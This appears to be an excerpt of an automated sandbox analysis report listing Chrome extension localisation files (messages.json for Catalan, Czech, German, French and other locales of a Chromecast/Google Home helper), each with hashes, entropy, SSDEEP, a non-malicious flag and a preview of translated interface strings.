                                                                                                                                                                MD5:F9DDF525C07251282A3BFFCEE9A09ABB
                                                                                                                                                                SHA1:A343A078E804AF400A8F3E1891E3390DA754A5CD
                                                                                                                                                                SHA-256:C69C6C90F7EB8F10685CD815AF1F6F1B87CF30C4E8D95DF1D577DE1105AAD227
                                                                                                                                                                SHA-512:EBD339C37162984672513019D470B92DF8B743DD69D4430361EF12D42FD1C208DBDE818A7BFE20BE8A7D63CD6E02B3F4344DEA1C4AEDB8719D789981A49DA44C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".... ...".. },.. "1213957982723875920": {.. "message": "..... ....... ..... ........... ...... ....... ...... ...?".. },.. "128276876460319075": {.. "message": "...... ........".. },.. "1428448869078126731": {.. "message": "...... ......... ...".. },.. "1522140683318860351": {.. "message": "..... .... ...... ....... ... ... .... ...... .....".. },.. "1550904064710828958": {.. "message": ".........".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": ".....".. },.. "1850397500312020388": {.. "message": "$START_LINK$ Google
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ca\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15504
                                                                                                                                                                Entropy (8bit):5.242147131052711
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:drGUBKxMF2/yv8FrIccUVFmwf+7d9VKS3V6uml:dCUBKxMFky0FE3UzmQ+zkSl6uml
                                                                                                                                                                MD5:F4027E578039603B6F889BE278AA90CF
                                                                                                                                                                SHA1:37708BDE29853C44BB1D4F908325060C77D30099
                                                                                                                                                                SHA-256:6484F63DE621C47FD96C063C3011955BCA45BD8787636C65A0863AA3E99F56C2
                                                                                                                                                                SHA-512:7430597170386B38BFAB1D2F143B5DA0362F8E4AE6A9DA6C189F8C3493ED28FD0B8CD96A62AC0E464502CE746DE1CA727DFE591BF13AA8957178CDF85C8CD57C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Es congela".. },.. "1213957982723875920": {.. "message": "Quina de les opcions.seg.ents descriu millor la vostra xarxa?".. },.. "128276876460319075": {.. "message": "Detecci. de dispositius".. },.. "1428448869078126731": {.. "message": "Flu.desa del v.deo".. },.. "1522140683318860351": {.. "message": "S'ha produ.t un error en la connexi.. Torneu-ho a provar.".. },.. "1550904064710828958": {.. "message": "Correcta".. },.. "1636686747687494376": {.. "message": "Perfecta".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Pots veure el Chromecast a l'$START_LINK$aplicaci. Google.Home$END_LINK$?$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\cs\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15552
                                                                                                                                                                Entropy (8bit):5.406413558584244
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:eVdprJrG5efiTk93ebrxZR1fdc8VDCwT9fTV6c8TEKdl:2rMqiQerxQ88W7V6uml
                                                                                                                                                                MD5:17E753EE877FDED25886D5F7925CA652
                                                                                                                                                                SHA1:8E4EC969777CC0CEB7C12D0C1B9D87EBBB9C4678
                                                                                                                                                                SHA-256:C562FCCFCE374D446BFAC30AC9B18FF17E7A3EF101C919FF857104917F300382
                                                                                                                                                                SHA-512:33D61F6327FC81D7A45AA2CC97922DC527F5F43E54AA1A1638DA6EE407024A2F10CFD82CC5C3C581C2E7B216276987CB26C3FA95198572E139ACF29CC5B7ADCB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Video zamrz.".. },.. "1213957982723875920": {.. "message": "Kter. popis nejl.pe vystihuje va.i s..?".. },.. "128276876460319075": {.. "message": "Zji..ov.n. za..zen.".. },.. "1428448869078126731": {.. "message": "Plynulost videa".. },.. "1522140683318860351": {.. "message": "P.ipojen. se nezda.ilo. Zkuste to pros.m znovu.".. },.. "1550904064710828958": {.. "message": "Plynul.".. },.. "1636686747687494376": {.. "message": "Perfektn.".. },.. "1802762746589457177": {.. "message": "Hlasitost".. },.. "1850397500312020388": {.. "message": "Vid.te sv.j Chromecast v.$START_LINK$aplikaci Google Home $END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\da\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15340
                                                                                                                                                                Entropy (8bit):5.2479291792849105
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:+Upr8XnI1MY2kPuir8j7Rd3kbTWc4QtV6c8TEKdl:FrJ1H9br8h6eZCV6uml
                                                                                                                                                                MD5:F08A313C78454109B629B37521959B33
                                                                                                                                                                SHA1:3D585D52EC8B4399F66D4BE88CED10F4A034FCCC
                                                                                                                                                                SHA-256:23BF7E5EDF70291CA6D8F4A64788C5B86379EECB628E3DFA7DD83344612F7564
                                                                                                                                                                SHA-512:9F2868AEBBF7F6167A7EA120FE65E752F9A65D1DC51072AA2413B2FDE374DA2D169D455A4788E341717F694179E6F1FA80413C080D9CD8CB397C3E84668CBFEC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Fryser".. },.. "1213957982723875920": {.. "message": "Hvilket af f.lgende udsagn beskriver bedst dit netv.rk?".. },.. "128276876460319075": {.. "message": "Enhedsregistrering".. },.. "1428448869078126731": {.. "message": "Videostabilitet".. },.. "1522140683318860351": {.. "message": "Forbindelsen blev afbrudt. Pr.v igen.".. },.. "1550904064710828958": {.. "message": "Problemfri".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Lydstyrke".. },.. "1850397500312020388": {.. "message": "Kan du se din Chromecast i $START_LINK$ Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "STAR
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\de\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15555
                                                                                                                                                                Entropy (8bit):5.258022363187752
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:AJprM71A4qyJSwlk5KR5rtXsmvL0xhVw921YV6c8TEKdl:2re3jJS5A5rt8msA2KV6uml
                                                                                                                                                                MD5:980FB419ED6ED94AD75686AFFB4E4C2E
                                                                                                                                                                SHA1:871BFBCA6BCBA9197811883A93C50C0716562D57
                                                                                                                                                                SHA-256:585C7814AFD2453232BC940252D4AE821D6E6CBCFD74A793F78E5DB8BA5342F1
                                                                                                                                                                SHA-512:1681FA9C3BA882250A5005FB807D759EB8A634F1AA011725B1C865C0028BE7AB7BC16DC821A7F5BBFBA84C91E7D663ADE715284798E7E84E8FFF2D254488882D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "H.ngenbleiben".. },.. "1213957982723875920": {.. "message": "Welche dieser Aussagen beschreibt dein Netzwerk am besten?".. },.. "128276876460319075": {.. "message": "Ger.teerkennung".. },.. "1428448869078126731": {.. "message": "Videowiedergabequalit.t".. },.. "1522140683318860351": {.. "message": "Fehler beim Herstellen der Verbindung. Bitte versuche es noch einmal.".. },.. "1550904064710828958": {.. "message": "St.rungsfrei".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Lautst.rke".. },.. "1850397500312020388": {.. "message": "Siehst du deinen Chromecast in der $START_LINK$Google Home App$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\el\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17941
                                                                                                                                                                Entropy (8bit):5.465343004010711
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:S0rDuhLh41cZrP3TzDBknbpgo6djIV6uml:S0fuBh46ZD3TzDinbpgoUK6uml
                                                                                                                                                                MD5:40EB778339005A24FF9DA775D56E02B7
                                                                                                                                                                SHA1:B00561CC7020F7FE717B5F692884253C689A7C61
                                                                                                                                                                SHA-256:F56BF7C171AA20038EE30B754478B69A98F3014C89362779B0A8788C7B9BEEE1
                                                                                                                                                                SHA-512:8BED281A33EC1E4E88A9F9D62BB13FE0266C0FAF8856D1DC2A843D26DD3CE5E7D1400FD3325ABD783B0364EC4FB1188AD941D56AEB9073BC365BE0D12DE6C013
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": ".... ... .. ........ .......... ........ .. ...... ...;".. },.. "128276876460319075": {.. "message": ".......... ........".. },.. "1428448869078126731": {.. "message": "......... ......".. },.. "1522140683318860351": {.. "message": "........ ......... ......... .....".. },.. "1550904064710828958": {.. "message": ".....".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "...... ....".. },.. "1850397500312020388": {.. "message": "........ .. ..... .. Chromecast .... $START_LINK$........ Google Home$END_LINK$; $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\en\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14897
                                                                                                                                                                Entropy (8bit):5.197356586852831
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:2MKUOp5N7GTNMRuv6M0bIt3FXGkW6/5NkkQ9NJKJhnH3t9F410sUA+ISN6cGDSyR:VKzprogudTGkWqrKcJhdIR+V6c8TEKdl
                                                                                                                                                                MD5:8351AF4EA9BDD9C09019BC85D25B0016
                                                                                                                                                                SHA1:F6EC1FFD291C8632758E01C9EE837B1AD18D4DCF
                                                                                                                                                                SHA-256:F41C82D8A4F0E9B645656D630C882BE94A0FB7F8CEC0FE864B57298F0312B212
                                                                                                                                                                SHA-512:75672B57F21F38F97341AD76A199AD764E9FBAB2384D701BF6EB06CEFDE6C4F20F047F9051A4E30D99621E5C1FBBDB9E38E8D2B47470806704B38DA130A146CF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Freezes".. },.. "1213957982723875920": {.. "message": "Which of the following best describes your network?".. },.. "128276876460319075": {.. "message": "Device Discovery".. },.. "1428448869078126731": {.. "message": "Video Smoothness".. },.. "1522140683318860351": {.. "message": "Connection failed. Please try again.".. },.. "1550904064710828958": {.. "message": "Smooth".. },.. "1636686747687494376": {.. "message": "Perfect".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Are you able to see your Chromecast in the $START_LINK$ Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\es\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15560
                                                                                                                                                                Entropy (8bit):5.236752363299121
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:NAgprfy1pTCukFr+1DIyDRoanvV6c8TEKdl:KMrq6FrmvV6uml
                                                                                                                                                                MD5:8A70C18BB1090AA4D500DE9E8E4A00EF
                                                                                                                                                                SHA1:8AFC097FA956C1317DB0835348B2DA19F0789669
                                                                                                                                                                SHA-256:FF173D1CEF665B1234E02F11070ABD2B65230318150734579A03C7F31B4AE3F4
                                                                                                                                                                SHA-512:140BAF40A4ABE9B8AF0855B0EBB7DFDF17869EDFC4EE1037C5EA7FDD8EDEBD4850E055B6A4D7B8782657618BCE1517813779BA01BA993CC838BB43E0BE71EEEE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Congelaci.n de im.genes".. },.. "1213957982723875920": {.. "message": ".Cu.l de las siguientes respuestas describe mejor tu red?".. },.. "128276876460319075": {.. "message": "Detecci.n de dispositivo".. },.. "1428448869078126731": {.. "message": "Fluidez del v.deo".. },.. "1522140683318860351": {.. "message": "Error en la conexi.n. Vuelve a intentarlo.".. },.. "1550904064710828958": {.. "message": "V.deo fluido".. },.. "1636686747687494376": {.. "message": "Perfecta".. },.. "1802762746589457177": {.. "message": "Volumen".. },.. "1850397500312020388": {.. "message": ".Puedes ver tu Chromecast en la $START_LINK$aplicaci.n Google.Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\et\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15139
                                                                                                                                                                Entropy (8bit):5.228213017029721
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:Z48bxhWYp5Ny5M63niwAKD4rrJSJ2RkPXh9P5NFP2+NBMU01jewUEVez3QOiSevy:ikxprot3lYkf/rHBc0KsUV6c8TEKdl
                                                                                                                                                                MD5:A62F12BCBA6D2C579212CA2FF90F8266
                                                                                                                                                                SHA1:F7E964A2D9BBDA364252BCE5CFBA3FD34FDD825E
                                                                                                                                                                SHA-256:3EB3EB0B3B4A8E5A477D1B3C3A3891CCC7DC6B8879ECE243A7BD7C478068273D
                                                                                                                                                                SHA-512:E300201245C00ADEC8F39D586875F8FA4607AB203572BF3CE353C1CA7CDCA05B8786810CA0CEE27E4EA54A5EFD53690F1EA7AA4148CFF472A66BB11202723566
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Hangub".. },.. "1213957982723875920": {.. "message": "Milline j.rgmistest v.idetest kirjeldab k.ige paremini teie v.rku?".. },.. "128276876460319075": {.. "message": "Seadme tuvastamine".. },.. "1428448869078126731": {.. "message": "Video sujuvus".. },.. "1522140683318860351": {.. "message": ".hendamine eba.nnestus. Proovige uuesti.".. },.. "1550904064710828958": {.. "message": ".htlane".. },.. "1636686747687494376": {.. "message": "T.iuslik".. },.. "1802762746589457177": {.. "message": "Helitugevus".. },.. "1850397500312020388": {.. "message": "Kas n.ete oma Chromecasti $START_LINK$rakenduses Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\fa\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17007
                                                                                                                                                                Entropy (8bit):5.486206928823098
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rngaIprIX/t9wkjTJrs3hqaXxRQdiIMDnD+LhfHdo5tV6c8TEKdl:4rin5rU1X7Qd0M90tV6uml
                                                                                                                                                                MD5:F7B16CCC7B0670E26AF62C5F3220D416
                                                                                                                                                                SHA1:0CF2D31BEF1900E73FA9529E51F1AC1DB2B81EDE
                                                                                                                                                                SHA-256:84560CB7F847A00515B676B62F2B82C3D56CEA0CB397D457474263588683FEEF
                                                                                                                                                                SHA-512:8631A3B4A36D5A3D9354A71A5CB34BD1B9FA4062D497D3F1EB118365E314B5CA15F0EDAD6393FCA0C216F6E4806FF34905AEE0EF678CBCDAFB183AF376E94109
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".... ... .......".. },.. "1213957982723875920": {.. "message": ".... .. .. ..... ... .... ... .. .. ...... ... ..... .......".. },.. "128276876460319075": {.. "message": "..... ......".. },.. "1428448869078126731": {.. "message": "..... .....".. },.. "1522140683318860351": {.. "message": "..... ...... .... ..... ...... ...... .....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": "..... ...".. },.. "1850397500312020388": {.. "message": ".... ......... Chromecast ... .. .. $START_LINK$ ...... Google Home$END_LINK$ ....... $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\fi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15265
                                                                                                                                                                Entropy (8bit):5.268294112434671
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:efMprYxiYUNpj5Coik1tXxrUhvUzSPWV6c8TEKdl:eIrfbjosdrU5WV6uml
                                                                                                                                                                MD5:7389880D1E20BEB694BA9A548A2E8D3A
                                                                                                                                                                SHA1:55FC039EFFF508CC2231EE66104EC94489E74D92
                                                                                                                                                                SHA-256:15B086E3E7DF0FB8B497BC2C0D704181817A87CF9087B4AC13777CE2D4CE79D3
                                                                                                                                                                SHA-512:24D15CE4DC1E74BF0E7A54FF1626857D9E42CAE4260B78A27DD1544EA0376E9C17A4065BACE7438992A544442A866387B0CF2F6FE542D09CE9A0099ABA4D8E47
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Pys.htyy".. },.. "1213957982723875920": {.. "message": "Mik. seuraavista kuvaa parhaiten verkkoasi?".. },.. "128276876460319075": {.. "message": "Laitteiden tunnistaminen".. },.. "1428448869078126731": {.. "message": "Videon tasaisuus".. },.. "1522140683318860351": {.. "message": "Yhteys ep.onnistui. Yrit. uudelleen.".. },.. "1550904064710828958": {.. "message": "Tasainen".. },.. "1636686747687494376": {.. "message": "T.ydellinen".. },.. "1802762746589457177": {.. "message": "..nenvoimakkuus".. },.. "1850397500312020388": {.. "message": "N.etk. Chromecastisi $START_LINK$Google Home .sovelluksessa$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\fil\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15570
                                                                                                                                                                Entropy (8bit):5.1924418176212646
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:+esprzAsQp68wIJYkMyr2k0jR1/7Rr1uV6c8TEKdl:Gr78JDMyrR0tJuV6uml
                                                                                                                                                                MD5:59483AD798347B291363327D446FA107
                                                                                                                                                                SHA1:C069F29BB68FA7BA2631B0BF5BBF313346AC6736
                                                                                                                                                                SHA-256:DD47530EAE96346CD4DC3267A0BB1091BB17B704803A93CDA2E3E81551B94F12
                                                                                                                                                                SHA-512:091595CA135E965ED3DE376873541117F0E7A8EBDEB4714833EFDD6C820234373891BE5DEC437BA85CCB79CCCA053D407E6ADA17EBDAE7D313324A48775C0010
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Hindi gumagalaw".. },.. "1213957982723875920": {.. "message": "Alin sa sumusunod ang pinakamahusay na naglalarawan sa iyong network?".. },.. "128276876460319075": {.. "message": "Pagtuklas ng Device".. },.. "1428448869078126731": {.. "message": "Pagka-smooth ng Video".. },.. "1522140683318860351": {.. "message": "Hindi nakakonekta. Pakisubukang muli.".. },.. "1550904064710828958": {.. "message": "Smooth".. },.. "1636686747687494376": {.. "message": "Perpekto".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Nakikita mo ba ang iyong Chromecast sa $START_LINK$ Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\fr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15826
                                                                                                                                                                Entropy (8bit):5.277877116547859
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:nLZprAZg3EkV3sjrICe8L/1Va7lt1rlxLAkoYHHavV6c8TEKdl:vrW+2jrI7TdLAk3MV6uml
                                                                                                                                                                MD5:9B416146FE4F1403C2AACAC4DCF1A5C3
                                                                                                                                                                SHA1:616F055C9FAD4CE972DF82EC8A9B2F4EDA3E7FAD
                                                                                                                                                                SHA-256:7C7F5758F54008190ACCDDBD1761CBD980FB5FE0847E992874498228D2571DBC
                                                                                                                                                                SHA-512:6E8E70380A8C6E2C0587ADFF6AE36963EC76694904841CE1DFE4EEE215B917AD3E8AF727555627FBDF6B8BA6A4A0674D2B90AC4E9331B6628A32F4C4348FB51B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Se fige".. },.. "1213957982723875920": {.. "message": "Parmi les propositions suivantes, laquelle d.crit le mieux votre r.seau.?".. },.. "128276876460319075": {.. "message": "D.tection d'appareils".. },.. "1428448869078126731": {.. "message": "Fluidit. de la vid.o".. },.. "1522140683318860351": {.. "message": ".chec de la connexion. Veuillez r.essayer.".. },.. "1550904064710828958": {.. "message": "Fluide".. },.. "1636686747687494376": {.. "message": "Parfaite".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Votre Chromecast est-il visible dans l'$START_LINK$application Google.Home$END_LINK$.? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\gu\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):19260
                                                                                                                                                                Entropy (8bit):5.326067910239208
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:Hq2Mr+qPlJKYMdzKgXr3dGsUF+yAK37Wf7Cy/V6uml:KxzTVgX1ykj6uml
                                                                                                                                                                MD5:8AD20A0A87D839F400C102DED115A861
                                                                                                                                                                SHA1:C3B241388F2EB78A8F76117C045BD2A29E10E142
                                                                                                                                                                SHA-256:2389976FC141F5FCC592E84D2D2D7D1E05DC0818F8324AD3FB97910F629BC591
                                                                                                                                                                SHA-512:0B0F53EC1B8ACF26E4CFA0E27E759D09648FD19E06F067B2D8E7056319F6799A161B137A4327D01150502E78C0DC9991A5443E015F2ADB9BADADF86E35AB76B3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "........... .... ..... .......... ....... ..... ... ..?".. },.. "128276876460319075": {.. "message": "..... ...".. },.. "1428448869078126731": {.. "message": "........ ......".. },.. "1522140683318860351": {.. "message": "....... ...... ..... .... ..... ..... ...... ....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": ".......".. },.. "1850397500312020388": {.. "message": "... ... $START_LINK$ Google Home ..$END_LINK$... Chromecast..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\hi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):19387
                                                                                                                                                                Entropy (8bit):5.329218714975947
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:zrGrSmhKy7KyY+bNEDElQdrMEPxtShJV6uml:zBqGUQdwEPrW6uml
                                                                                                                                                                MD5:C64C74B256C0BE49022EC3A97FBC2498
                                                                                                                                                                SHA1:ECBEAA704609841242A5B8ED5EAA5816C1A3D978
                                                                                                                                                                SHA-256:57AF2C95207DCF094DFA6236B6CBA9B091088AA4DD92A095149315A898D3BCED
                                                                                                                                                                SHA-512:1117B6073A5AFF0007AB0B75DEFE7560A4A42795027C50ED4B346988BB4FD19344F22AD347EB1A49556928571066E32DE0AC7EC66D0E367817A22E30503D09D0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "..... ... .. ... .... ....... .. .... ..... ..... .... ..?".. },.. "128276876460319075": {.. "message": "...... ...".. },.. "1428448869078126731": {.. "message": "...... .........".. },.. "1522140683318860351": {.. "message": "....... ..... ..... .... ...... .....".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": ".....".. },.. "1850397500312020388": {.. "message": ".... .. $START_LINK$ Google Home .........$END_LINK$ ... .... Ch
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\hr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15503
                                                                                                                                                                Entropy (8bit):5.29020775977578
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:Pdapr6h85tRwVQgkvJryLkla5Kfndg6V6c8TEKdl:Arwot2Q7BryVce6V6uml
                                                                                                                                                                MD5:E4C43BBDDA7ED7A09B811914827019F7
                                                                                                                                                                SHA1:F5699E4BBBBFA126B9102084D00C5C771B5F1EB6
                                                                                                                                                                SHA-256:69254040E0E05228905AD04C9C8F3ED885FDE566752A1B006C8D87928E43F10C
                                                                                                                                                                SHA-512:C7853C54E803EAAE23B153F6BDD76CC4B230B21D5C51CD453BE7A5CE53E51B9F655918AB0D9383D66F8BF9429636485DC46FF74B919ED36C3D28CC448EA10EE5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
